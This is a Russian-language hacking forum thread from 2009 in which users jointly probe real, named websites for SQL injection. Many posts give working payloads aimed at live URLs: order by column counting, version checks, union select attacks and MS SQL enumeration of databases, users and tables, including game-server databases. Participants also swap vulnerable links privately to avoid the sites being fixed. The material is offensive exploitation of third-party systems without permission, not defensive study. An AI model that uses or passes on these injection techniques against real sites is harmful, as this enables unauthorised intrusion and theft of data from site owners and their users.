KPbIBe[D]Ko

Мне надоело тереть твои посты. Прочти правила форума, раздела, темы, ПМ. Хоть что-нибудь прочитай. Просьбы о взломах, о поиске багов, сюда постить не надо. Здесь разбирают конкретные уязвимости УЖЕ найденные. По которым необходима какая-либо помощь

S0ulVortex
14.03.2009, 20:09
S0ulVortex

А как по твоему по ошибке можно сказать о наличии или отсутствие вывода?
Со 100% уверенностью нельзя даже сказать, есть там скуль или нет. Хотя. думаю, что есть и запрос будет примерно такой:
1') order by 1/* но это лишь предположение




Я не уверен, но интуиция подсказывает что такая ошибка на столь значительном проекте это уже просто недочет о котором не заметили и по этому я так уверенно задал вопрос а вдруг прокатит.
А вот что ещё заметил это получается в поиске при добавление кавычки ( ' ) вылетает такое сообщение. Еслиже писать любой текст или ещё че он пишет типа ничего не найдено.
Заметил ещё ошибка меняется если ставить просто ( ' )
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 6
А если к примеру поставить такое ( ' -- )
Ошибка такая
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or entities.name like '%--%' or entities.description like '%
А при ( ') order by 1/* )
выводит такую ошибку
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '')%' or entities.description like '%1')%') and (entities.keyword

А если ставить ( ' ' ) то ошибка пропадает

Pashkela
14.03.2009, 21:02
Здорово конечно, но еще здоровее будет, если будет ссылка

S0ulVortex
14.03.2009, 21:09
Здорово конечно, но еще здоровее будет, если будет ссылка
А если она выводит а я паблик выложу как то не хорошо получится. Закроют и все.

S00pY
14.03.2009, 21:34
S0ulVortex
1%') order by 1/*
попробуй просто интересно,что ответит

S0ulVortex
14.03.2009, 21:46
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ')%') and (entities.keywords like '%order%' or entities.name li
Дальше невидно и в исходнике обрывается
Сразу говарю недавно заметил что это оказывается строка поиска и если в ней ввести ( ' ) вылезает такая ошибка которую я выше писал.

AkyHa_MaTaTa
14.03.2009, 21:54
Кавычки ставлю в 1 поле. http://i027.radikal.ru/0903/5d/a825cc03c2ec.jpg
похоже на то что после 1') ничего в запрос не пошло, може после пробыла все режеться, попробуй
1%')/**/order/**/by/**/1/*

S0ulVortex
14.03.2009, 21:57
похоже на то что после 1') ничего в запрос не пошло, може после пробыла все режеться, попробуй
1%')/**/order/**/by/**/1/*
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order/**/by/**/1/*%' or entities.description like '%1%')/**/ord
Вот че выводит

AkyHa_MaTaTa
14.03.2009, 22:11
Возможно что тот запрос в котором ошибка вставляеться значения из другого запроса или это переменая вставляеться несколько раз, но самое плохое судя по ответу почему то что не проходит финт с коментом /*, то есть остальной запрос не закрываеться(и вполне возможно что запрос многострочный и -- и # не проканает), если бы видеть всю ошибку.

S0ulVortex
14.03.2009, 22:14
Возможно что тот запрос в котором ошибка вставляеться значения из другого запроса или это переменая вставляеться несколько раз, но самое плохое судя по ответу почему то что не проходит финт с коментом /*, то есть остальной запрос не закрываеться(и вполне возможно что запрос многострочный и -- и # не проканает), если бы видеть всю ошибку.
Да вот я тоже хотел бы увидеть полностью но он режит и в исходнике режит

Pashkela
14.03.2009, 22:15
Ну скинь ты ему ссылку в личку, весь форум потянули при моём даже разрешении

S0ulVortex
14.03.2009, 22:23
Народ а че все прицепились к order может есть какие идеи через другое ченють. Может че то с оператором like тут связанно?

Вот ещё при ( ' order by 1/* ) выводит
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order%' or entities.name like '%order%' or entities.description
Если смотрять концовку то тут видео name like '%order%' or entities.description А в остольных он выводил до name li это по моему и есть продолжение всех выводов заканчивающихся на name li.

P.s если кто хочет помочь чтобы не ждать и не засорять форум стучите в аську 1106663

AkyHa_MaTaTa
14.03.2009, 22:44
Cудя по всему входная переменая которая вставляестся в запрос дробиться по пробелам на составляюшии, да и не узаю ff 3 ветки для sql injection.

S00pY
14.03.2009, 22:59
AkyHa_MaTaTa
походу прав,типо поиск по словам.... если б как-то обрезать запрос дальше...

Parserian
15.03.2009, 04:49
может кто ткнет в носом с статью в которой расматривается октрытие порта на удаленном сервере, конект к данному порту неткатом. и т..д..
(зі ткните в меня этим неткатом, поиск дает лишь кмс неткат)

к сожалению кроме двух видео ничего не нашел.
спасибо.

TELO
15.03.2009, 06:23
а как тут узнать количество столбцов?
http://mega-porno.ru/video.php?category=1'

PaCo
15.03.2009, 06:42
переменая вставляеться в 2 запроса а потом еще и на оснавании этих зопросов какое то значения вставляеться в 3 запрос(а может дальше еще в один) или например проверка на is_numeric в 3 запросе.

R1dex
15.03.2009, 07:39
переменая вставляеться в 2 запроса а потом еще и на оснавании этих зопросов какое то значения вставляеться в 3 запрос(а может дальше еще в один) или например проверка на is_numeric в 3 запросе.

Ты правда думаешь, что это ему что-то даст?

2TELO:

http://mega-porno.ru/video.php?category=1')+order+by+1--+

5-ая ветка:

http://mega-porno.ru/video.php?category=1'+and+substring(version(),1,1) ='5

ElteRUS
15.03.2009, 13:57
а как тут узнать количество столбцов?
http://mega-porno.ru/video.php?category=1'


http://forum.antichat.ru/showpost.php?p=1118647

Ровно месяц прошел )

Imperou$
15.03.2009, 16:48
Нашёл багу, всё стандартно "You have an error in your SQL syntax",но при подборе столбцов order by вместо Unknown column '100' появляется Unknown column 'foto2' in 'field list'.
Как быть?

R1dex
15.03.2009, 16:53
Скинуть ссылку..

Imperou$
15.03.2009, 16:59
Ничего не получал, отошли ещё раз.
Скинул в пм.

z00MAN
15.03.2009, 17:07
Остальным желающим в пм могу скинуть.
кидай

newpdv
15.03.2009, 17:33
Расскажите как можно добавить несколько одинаковых сайтов?
http://1xx.ru/1x9
http://s51.radikal.ru/i133/0903/26/d6c6613a39f9t.jpg (http://s51.radikal.ru/i133/0903/26/d6c6613a39f9.png)

Нет идей??

fedi
15.03.2009, 18:57
С помощью DB_NAME(n) перебирая n я нашел еще
1)master
2)tempdb
3)model
4)msdb
5)lin2db
6)lin2comm
7)l2gloss
8)lin2world
9) lin2log
10)lin2clancomm
SELECT user_name();
SELECT system_user;
SELECT user;
имя юзера stat и имя таблицы с помощью:
DB_NAME() - имя таблицы: lin2world


версия - 1 or 1=@@version--
таблицы - 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
колонки - 1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+TABLES+WHERE+TABLE_NAME+NOT+IN+('и мя таблицы'))--

Проблема в том что запросы такого видв не проходят.
http://darkomen.ru/?go=19&indx=2980+union+select+1,2,@@version,4,5,6,7,8,9,0 ,11,12--
Всю информацию я узнал только через union select. И подставлял в запрос вместо цифр DB_NAME(n) user_name() @@version.\
Можно ли с использованием union select сделать что нибудь?
Плиз скажите как с ними работать и что полезного и как из них взять.
Не могу понять почему удаляют пост я не там пишу что ли? Просто очень интересная для меня тема перечитал все мануалы которые нашел. но не могу понять как сделать помогите кто нить пожалусто.

Imperou$
15.03.2009, 20:20
Не получается раскрутить
http://www.carochasolicar.com/detalhesp.php?tipo=4'
Двойной запрос? Попробуйте плз, кому не лень.

ElteRUS
15.03.2009, 20:50
Imperou$, там функции mysql_result() передается пустой результат от запроса. От того и ошибка


fedi, доступа к базам л2-сервара нету

http://darkomen.ru/?go=19&indx=-1+union+select+1,2,3,4,5,6,7,8,9,1,1,1+from+lin2db .user_account

Его как правило и не бывает. С этими базами работает непосредственно л2-сервер

fedi
15.03.2009, 21:58
Получается во все эти базы зайти нельзя, не в одну? а как их тогда вообще открывают?

fedi
15.03.2009, 22:00
мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?

Pashkela
15.03.2009, 22:22
Не получается раскрутить
http://www.carochasolicar.com/detalhesp.php?tipo=4'
Двойной запрос? Попробуйте плз, кому не лень.

по моему это просто раскрытие пути и вовсе не скуля

PaCo
15.03.2009, 22:25
мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?
нету там фильтра на from
http://darkomen.ru/?go=19&indx=-1+union+all+select+1,2,3,4,5,6,7,8,9,1,1,1+from+IN FORMATION_SCHEMA.TABLES--

Imperou$
15.03.2009, 22:34
Подобрал поля, (25) через 'order+by', но при попытке вывести выводимое, тупо not found.Видимо фильтруется union или select.
Версия пятая.

http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline=141060+and+substring(version(),1,1)=5--&totalItems=3709&pageID=2

что можно сделать? Очень нужен совет.